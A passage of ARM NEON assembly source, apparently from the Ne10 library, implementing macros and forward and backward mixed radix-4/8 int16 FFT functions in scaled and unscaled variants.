vadd.s16 q_s0_2, q_in0_01, q_in2_01
vsub.s16 q_s1_2, q_in0_01, q_in2_01
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vadd.s16 q_s2_2, q_in1_01, q_in3_01
vsub.s16 q_s3_2, q_in1_01, q_in3_01
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
vsub.s16 q_out2_2, q_s0_2, q_s2_2
vadd.s16 q_out0_2, q_s0_2, q_s2_2
.ifeqs "\inverse", "TRUE"
vsub.s16 d_out1_r15, d_s1_r2, d_s3_i2
vadd.s16 d_out1_i15, d_s1_i2, d_s3_r2
vadd.s16 d_out3_r37, d_s1_r2, d_s3_i2
vsub.s16 d_out3_i37, d_s1_i2, d_s3_r2
.else
vadd.s16 d_out1_r15, d_s1_r2, d_s3_i2
vsub.s16 d_out1_i15, d_s1_i2, d_s3_r2
vsub.s16 d_out3_r37, d_s1_r2, d_s3_i2
vadd.s16 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.endif
/*
* 0 4 8 c 0 1 2 3
* 1 5 9 d ----> 4 5 6 7
* 2 6 a e ----> 8 9 a b
* 3 7 b f c d e f
*/
vtrn.16 q_out0_2, q_out1_2
vtrn.16 q_out2_2, q_out3_2
vtrn.32 q_out0_2, q_out2_2
vtrn.32 q_out1_2, q_out3_2
vst2.16 {q_out0_2}, [p_tmp]!
vst2.16 {q_out1_2}, [p_tmp]!
vst2.16 {q_out2_2}, [p_tmp]!
vst2.16 {q_out3_2}, [p_tmp]!
.endm
.macro BUTTERFLY4X4_WITH_TWIDDLES scaled_flag, inverse, last_stage
sub p_in1, p_in1, nstep, lsl #2
add p_in1, p_in1, #16
sub p_tw1, p_tw1, mstep, lsl #1
add p_tw1, p_tw1, #16
vmov q_scr0, q_fin0
vmull.s16 q_scr1_r, d_fin1_r, d_tw0_r
vmull.s16 q_scr1_i, d_fin1_i, d_tw0_r
vmull.s16 q_scr2_r, d_fin2_r, d_tw1_r
vmull.s16 q_scr2_i, d_fin2_i, d_tw1_r
vmull.s16 q_scr3_r, d_fin3_r, d_tw2_r
vmull.s16 q_scr3_i, d_fin3_i, d_tw2_r
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
.ifeqs "\inverse", "TRUE"
vmlal.s16 q_scr1_r, d_fin1_i, d_tw0_i
vmlsl.s16 q_scr1_i, d_fin1_r, d_tw0_i
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlal.s16 q_scr2_r, d_fin2_i, d_tw1_i
vmlsl.s16 q_scr2_i, d_fin2_r, d_tw1_i
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlal.s16 q_scr3_r, d_fin3_i, d_tw2_i
vmlsl.s16 q_scr3_i, d_fin3_r, d_tw2_i
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.else
vmlsl.s16 q_scr1_r, d_fin1_i, d_tw0_i
vmlal.s16 q_scr1_i, d_fin1_r, d_tw0_i
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlsl.s16 q_scr2_r, d_fin2_i, d_tw1_i
vmlal.s16 q_scr2_i, d_fin2_r, d_tw1_i
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlsl.s16 q_scr3_r, d_fin3_i, d_tw2_i
vmlal.s16 q_scr3_i, d_fin3_r, d_tw2_i
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.endif
vrshrn.i32 d_scr1_r, q_scr1_r, #15
vrshrn.i32 d_scr1_i, q_scr1_i, #15
vrshrn.i32 d_scr2_r, q_scr2_r, #15
vrshrn.i32 d_scr2_i, q_scr2_i, #15
vrshrn.i32 d_scr3_r, q_scr3_r, #15
vrshrn.i32 d_scr3_i, q_scr3_i, #15
.ifeqs "\scaled_flag", "TRUE"
vhadd.s16 q_scr4, q_scr0, q_scr2
vhsub.s16 q_scr5, q_scr0, q_scr2
vhadd.s16 q_scr6, q_scr1, q_scr3
vhsub.s16 q_scr7, q_scr1, q_scr3
vhadd.s16 q_fout0, q_scr4, q_scr6
vhsub.s16 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vhsub.s16 d_fout1_r, d_scr5_r, d_scr7_i
vhadd.s16 d_fout1_i, d_scr5_i, d_scr7_r
vhadd.s16 d_fout3_r, d_scr5_r, d_scr7_i
vhsub.s16 d_fout3_i, d_scr5_i, d_scr7_r
.else
vhadd.s16 d_fout1_r, d_scr5_r, d_scr7_i
vhsub.s16 d_fout1_i, d_scr5_i, d_scr7_r
vhsub.s16 d_fout3_r, d_scr5_r, d_scr7_i
vhadd.s16 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.else
vadd.s16 q_scr4, q_scr0, q_scr2
vsub.s16 q_scr5, q_scr0, q_scr2
vadd.s16 q_scr6, q_scr1, q_scr3
vsub.s16 q_scr7, q_scr1, q_scr3
vadd.s16 q_fout0, q_scr4, q_scr6
vsub.s16 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vsub.s16 d_fout1_r, d_scr5_r, d_scr7_i
vadd.s16 d_fout1_i, d_scr5_i, d_scr7_r
vadd.s16 d_fout3_r, d_scr5_r, d_scr7_i
vsub.s16 d_fout3_i, d_scr5_i, d_scr7_r
.else
vadd.s16 d_fout1_r, d_scr5_r, d_scr7_i
vsub.s16 d_fout1_i, d_scr5_i, d_scr7_r
vsub.s16 d_fout3_r, d_scr5_r, d_scr7_i
vadd.s16 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.endif
vst2.16 {d_fout0_r, d_fout0_i}, [p_out1], mstep
vst2.16 {d_fout1_r, d_fout1_i}, [p_out1], mstep
vst2.16 {d_fout2_r, d_fout2_i}, [p_out1], mstep
vst2.16 {d_fout3_r, d_fout3_i}, [p_out1], mstep
sub p_out1, p_out1, mstep, lsl #2
add p_out1, p_out1, #16
.endm
.macro BUTTERFLY8X4_WITHOUT_TWIDDLES scaled_flag, inverse
/**
* q_in0: Fin1[0]
* q_in1: Fin1[0 + fstride]
* q_in2: Fin1[fstride1]
* q_in3: Fin1[fstride1 + fstride]
* q_in4: Fin1[fstride1*2]
* q_in5: Fin1[fstride1*2 + fstride]
* q_in6: Fin1[fstride1*3]
* q_in7: Fin1[fstride1*3 + fstride]
*
*/
adr tmp0, .L_TW_81_16
vld2.16 {d_in0_r, d_in0_i}, [p_in1:64], fstep
vld2.16 {d_in2_r, d_in2_i}, [p_in1:64], fstep
vld2.16 {d_in4_r, d_in4_i}, [p_in1:64], fstep
vld2.16 {d_in6_r, d_in6_i}, [p_in1:64], fstep
vld2.16 {d_in1_r, d_in1_i}, [p_in1:64], fstep
vld2.16 {d_in3_r, d_in3_i}, [p_in1:64], fstep
vld2.16 {d_in5_r, d_in5_i}, [p_in1:64], fstep
vld2.16 {d_in7_r, d_in7_i}, [p_in1:64], fstep
.ifeqs "\scaled_flag", "TRUE"
vshr.s16 q_in0, q_in0, 3
vshr.s16 q_in1, q_in1, 3
vshr.s16 q_in2, q_in2, 3
vshr.s16 q_in3, q_in3, 3
vshr.s16 q_in4, q_in4, 3
vshr.s16 q_in5, q_in5, 3
vshr.s16 q_in6, q_in6, 3
vshr.s16 q_in7, q_in7, 3
.endif
// radix 4 butterfly without twiddles
vadd.s16 q_sin0, q_in0, q_in1
vsub.s16 q_sin1, q_in0, q_in1
vld1.16 {d_tw_twn}, [tmp0]
vadd.s16 q_sin2, q_in2, q_in3
vsub.s16 q_sin3, q_in2, q_in3
vadd.s16 q_sin4, q_in4, q_in5
vsub.s16 q_sin5, q_in4, q_in5
vadd.s16 q_sin6, q_in6, q_in7
vsub.s16 q_sin7, q_in6, q_in7
.ifeqs "\inverse", "TRUE"
vneg.s16 d_sin5_i, d_sin5_i
vsub.s16 d_s3_r, d_sin3_r, d_sin3_i
vadd.s16 d_s3_i, d_sin3_i, d_sin3_r
vadd.s16 d_s7_r, d_sin7_r, d_sin7_i
vsub.s16 d_s7_i, d_sin7_i, d_sin7_r
.else
vneg.s16 d_sin5_r, d_sin5_r
vadd.s16 d_s3_r, d_sin3_r, d_sin3_i
vsub.s16 d_s3_i, d_sin3_i, d_sin3_r
vsub.s16 d_s7_r, d_sin7_r, d_sin7_i
vadd.s16 d_s7_i, d_sin7_i, d_sin7_r
.endif
vswp d_sin5_r, d_sin5_i
vqdmulh.s16 q_s3, q_s3, d_tw_twn[0]
vqdmulh.s16 q_s7, q_s7, d_tw_twn[2]
// radix 2 butterfly
vadd.s16 q_s8, q_sin0, q_sin4
vadd.s16 q_s9, q_sin1, q_sin5
vsub.s16 q_s10, q_sin0, q_sin4
vsub.s16 q_s11, q_sin1, q_sin5
// radix 2 butterfly
vadd.s16 q_s12, q_sin2, q_sin6
vadd.s16 q_s13, q_s3, q_s7
vsub.s16 q_s14, q_sin2, q_sin6
vsub.s16 q_s15, q_s3, q_s7
vsub.s16 q_out4, q_s8, q_s12
vsub.s16 q_out5, q_s9, q_s13
vadd.s16 q_out0, q_s8, q_s12
vadd.s16 q_out1, q_s9, q_s13
.ifeqs "\inverse", "TRUE"
vsub.s16 d_out2_r, d_s10_r, d_s14_i
vadd.s16 d_out2_i, d_s10_i, d_s14_r
vsub.s16 d_out3_r, d_s11_r, d_s15_i
vadd.s16 d_out3_i, d_s11_i, d_s15_r
vadd.s16 d_out6_r, d_s10_r, d_s14_i
vsub.s16 d_out6_i, d_s10_i, d_s14_r
vadd.s16 d_out7_r, d_s11_r, d_s15_i
vsub.s16 d_out7_i, d_s11_i, d_s15_r
.else
vadd.s16 d_out2_r, d_s10_r, d_s14_i
vsub.s16 d_out2_i, d_s10_i, d_s14_r
vadd.s16 d_out3_r, d_s11_r, d_s15_i
vsub.s16 d_out3_i, d_s11_i, d_s15_r
vsub.s16 d_out6_r, d_s10_r, d_s14_i
vadd.s16 d_out6_i, d_s10_i, d_s14_r
vsub.s16 d_out7_r, d_s11_r, d_s15_i
vadd.s16 d_out7_i, d_s11_i, d_s15_r
.endif
vtrn.16 q_out0, q_out1
vtrn.16 q_out2, q_out3
vtrn.16 q_out4, q_out5
vtrn.16 q_out6, q_out7
vtrn.32 q_out0, q_out2
vtrn.32 q_out1, q_out3
vtrn.32 q_out4, q_out6
vtrn.32 q_out5, q_out7
vst2.16 {q_out0}, [p_out1]!
vst2.16 {q_out4}, [p_out1]!
vst2.16 {q_out1}, [p_out1]!
vst2.16 {q_out5}, [p_out1]!
vst2.16 {q_out2}, [p_out1]!
vst2.16 {q_out6}, [p_out1]!
vst2.16 {q_out3}, [p_out1]!
vst2.16 {q_out7}, [p_out1]!
sub p_in1, p_in1, fstep, lsl #3
add p_in1, p_in1, #16
.endm
.align 4
.L_TW_81_16:
.word 23169
.word -23169
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_forward_int16_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int16_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_unscaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_unscaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_unscaled_last_stages
bne .L_ne10_butterfly_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2
.L_ne10_radix8_butterfly_unscaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_unscaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_unscaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int16_unscaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_backward_int16_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int16_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_inverse_unscaled_last_stages
bne .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_unscaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int16_unscaled_neon */
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_forward_int16_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int16_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_scaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_scaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_scaled_last_stages
bne .L_ne10_butterfly_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2
.L_ne10_radix8_butterfly_scaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_scaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_scaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int16_scaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_backward_int16_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int16_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
